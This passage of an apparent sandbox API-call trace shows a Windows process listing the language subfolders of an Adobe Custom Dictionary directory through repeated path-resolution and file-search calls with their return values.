lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.097] GetLastError () returned 0x12 [0050.097] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\heb", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\heb", lpFilePart=0x0) returned 0x5c [0050.097] GetLastError () returned 0x12 [0050.097] SetErrorMode (uMode=0x1) returned 0x0 [0050.097] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\heb\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.098] GetLastError () returned 0x12 [0050.098] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.098] GetLastError () returned 0x12 [0050.098] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.098] GetLastError () returned 0x12 [0050.098] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.098] SetErrorMode (uMode=0x0) returned 0x1 [0050.098] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\heb", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\heb", lpFilePart=0x0) returned 0x5c [0050.098] GetLastError () returned 0x12 [0050.098] SetErrorMode (uMode=0x1) returned 0x0 [0050.098] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\heb\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.098] GetLastError () returned 0x12 [0050.098] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.098] GetLastError () returned 0x12 [0050.098] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.099] GetLastError () returned 0x12 [0050.099] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.099] SetErrorMode (uMode=0x0) returned 0x1 [0050.099] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hrv", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hrv", lpFilePart=0x0) returned 0x5c [0050.099] GetLastError () returned 0x12 [0050.099] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.099] GetLastError () returned 0x12 [0050.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.099] GetLastError () returned 0x12 [0050.099] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hrv", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hrv", lpFilePart=0x0) returned 0x5c [0050.099] GetLastError () returned 0x12 [0050.099] SetErrorMode (uMode=0x1) returned 0x0 [0050.099] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hrv\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0050.099] GetLastError () returned 0x12 [0050.099] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.099] GetLastError () returned 0x12 [0050.099] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.099] GetLastError () returned 0x12 [0050.099] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0050.099] SetErrorMode (uMode=0x0) returned 0x1 [0050.099] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hrv", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hrv", lpFilePart=0x0) returned 0x5c [0050.099] GetLastError () returned 0x12 [0050.138] SetErrorMode (uMode=0x1) returned 0x0 [0050.138] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hrv\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.138] GetLastError () returned 0x12 [0050.138] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.138] GetLastError () returned 0x12 [0050.138] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.138] GetLastError () returned 0x12 [0050.138] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.139] SetErrorMode (uMode=0x0) returned 0x1 [0050.139] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hun", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hun", lpFilePart=0x0) returned 0x5c [0050.139] GetLastError () returned 0x12 [0050.139] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.139] GetLastError () returned 0x12 [0050.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.139] GetLastError () returned 0x12 [0050.139] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hun", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hun", lpFilePart=0x0) returned 0x5c [0050.139] GetLastError () returned 0x12 [0050.139] SetErrorMode (uMode=0x1) returned 0x0 [0050.139] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hun\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.139] GetLastError () returned 0x12 [0050.139] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.139] GetLastError () returned 0x12 [0050.139] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.139] GetLastError () returned 0x12 [0050.139] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.139] SetErrorMode (uMode=0x0) returned 0x1 [0050.139] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hun", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hun", lpFilePart=0x0) returned 0x5c [0050.139] GetLastError () returned 0x12 [0050.139] SetErrorMode (uMode=0x1) returned 0x0 [0050.139] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\hun\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.139] GetLastError () returned 0x12 [0050.139] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.139] GetLastError () returned 0x12 [0050.139] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.139] GetLastError () returned 0x12 [0050.140] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.140] SetErrorMode (uMode=0x0) returned 0x1 [0050.140] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl", lpFilePart=0x0) returned 0x5c [0050.140] GetLastError () returned 0x12 [0050.140] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.140] GetLastError () returned 0x12 [0050.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.140] GetLastError () returned 0x12 [0050.140] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl", lpFilePart=0x0) returned 0x5c [0050.140] GetLastError () returned 0x12 [0050.140] SetErrorMode (uMode=0x1) returned 0x0 [0050.140] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.140] GetLastError () returned 0x12 [0050.140] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.140] GetLastError () returned 0x12 [0050.140] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.140] GetLastError () returned 0x12 [0050.140] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.140] SetErrorMode (uMode=0x0) returned 0x1 [0050.140] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl", lpFilePart=0x0) returned 0x5c [0050.140] GetLastError () returned 0x12 [0050.140] SetErrorMode (uMode=0x1) returned 0x0 [0050.140] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.140] GetLastError () returned 0x12 [0050.140] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.141] GetLastError () returned 0x12 [0050.141] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.141] GetLastError () returned 0x12 [0050.141] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.141] SetErrorMode (uMode=0x0) returned 0x1 [0050.141] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lav", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lav", lpFilePart=0x0) returned 0x5c [0050.141] GetLastError () returned 0x12 [0050.141] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.141] GetLastError () returned 0x12 [0050.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.141] GetLastError () returned 0x12 [0050.141] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lav", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lav", lpFilePart=0x0) returned 0x5c [0050.141] GetLastError () returned 0x12 [0050.141] SetErrorMode (uMode=0x1) returned 0x0 [0050.141] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lav\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.146] GetLastError () returned 0x12 [0050.146] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.146] GetLastError () returned 0x12 [0050.146] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.146] GetLastError () returned 0x12 [0050.146] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.146] SetErrorMode (uMode=0x0) returned 0x1 [0050.146] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lav", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lav", lpFilePart=0x0) returned 0x5c [0050.146] GetLastError () returned 0x12 [0050.146] SetErrorMode (uMode=0x1) returned 0x0 [0050.146] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lav\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.146] GetLastError () returned 0x12 [0050.147] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.147] GetLastError () returned 0x12 [0050.147] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.147] GetLastError () returned 0x12 [0050.147] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.147] SetErrorMode (uMode=0x0) returned 0x1 [0050.147] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lit", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lit", lpFilePart=0x0) returned 0x5c [0050.147] GetLastError () returned 0x12 [0050.147] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.147] GetLastError () returned 0x12 [0050.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.147] GetLastError () returned 0x12 [0050.147] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lit", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lit", lpFilePart=0x0) returned 0x5c [0050.147] GetLastError () returned 0x12 [0050.147] SetErrorMode (uMode=0x1) returned 0x0 [0050.147] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lit\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.147] GetLastError () returned 0x12 [0050.148] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.148] GetLastError () returned 0x12 [0050.148] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.148] GetLastError () returned 0x12 [0050.148] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.148] SetErrorMode (uMode=0x0) returned 0x1 [0050.148] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lit", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lit", lpFilePart=0x0) returned 0x5c [0050.148] GetLastError () returned 0x12 [0050.148] SetErrorMode (uMode=0x1) returned 0x0 [0050.148] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\lit\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.148] GetLastError () returned 0x12 [0050.148] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.148] GetLastError () returned 0x12 [0050.148] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.148] GetLastError () returned 0x12 [0050.148] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.148] SetErrorMode (uMode=0x0) returned 0x1 [0050.148] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw", lpFilePart=0x0) returned 0x5c [0050.148] GetLastError () returned 0x12 [0050.148] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.148] GetLastError () returned 0x12 [0050.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.148] GetLastError () returned 0x12 [0050.148] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw", lpFilePart=0x0) returned 0x5c [0050.148] GetLastError () returned 0x12 [0050.148] SetErrorMode (uMode=0x1) returned 0x0 [0050.148] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.149] GetLastError () returned 0x12 [0050.149] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.149] GetLastError () returned 0x12 [0050.149] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.149] GetLastError () returned 0x12 [0050.149] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.149] SetErrorMode (uMode=0x0) returned 0x1 [0050.149] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw", lpFilePart=0x0) returned 0x5c [0050.149] GetLastError () returned 0x12 [0050.149] SetErrorMode (uMode=0x1) returned 0x0 [0050.149] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.149] GetLastError () returned 0x12 [0050.149] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.149] GetLastError () returned 0x12 [0050.149] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.149] GetLastError () returned 0x12 [0050.149] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.149] SetErrorMode (uMode=0x0) returned 0x1 [0050.149] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nyn", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nyn", lpFilePart=0x0) returned 0x5c [0050.149] GetLastError () returned 0x12 [0050.149] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.149] GetLastError () returned 0x12 [0050.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.149] GetLastError () returned 0x12 [0050.149] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nyn", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nyn", lpFilePart=0x0) returned 0x5c [0050.149] GetLastError () returned 0x12 [0050.149] SetErrorMode (uMode=0x1) returned 0x0 [0050.149] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nyn\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.150] GetLastError () returned 0x12 [0050.150] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.150] GetLastError () returned 0x12 [0050.150] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.150] GetLastError () returned 0x12 [0050.150] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.150] SetErrorMode (uMode=0x0) returned 0x1 [0050.150] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nyn", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nyn", lpFilePart=0x0) returned 0x5c [0050.150] GetLastError () returned 0x12 [0050.150] SetErrorMode (uMode=0x1) returned 0x0 [0050.150] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nyn\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.150] GetLastError () returned 0x12 [0050.150] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.150] GetLastError () returned 0x12 [0050.150] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.150] GetLastError () returned 0x12 [0050.150] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.150] SetErrorMode (uMode=0x0) returned 0x1 [0050.150] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\pol", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\pol", lpFilePart=0x0) returned 0x5c [0050.150] GetLastError () returned 0x12 [0050.150] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.150] GetLastError () returned 0x12 [0050.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0050.150] GetLastError () returned 0x12 [0050.150] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\pol", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\pol", lpFilePart=0x0) returned 0x5c [0050.150] GetLastError () returned 0x12 [0050.150] SetErrorMode (uMode=0x1) returned 0x0 [0050.150] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\pol\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b20 [0050.150] GetLastError () returned 0x12 [0050.151] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0050.151] GetLastError () returned 0x12 [0050.151] FindNextFileW (in: hFindFile=0x360b20, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0050.151] GetLastError () returned 0x12 [0050.151] FindClose (in: hFindFile=0x360b20 | out: hFindFile=0x360b20) returned 1 [0050.151] SetErrorMode (uMode=0x0) returned 0x1 [0050.151] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\pol", nBufferLength=0x105, 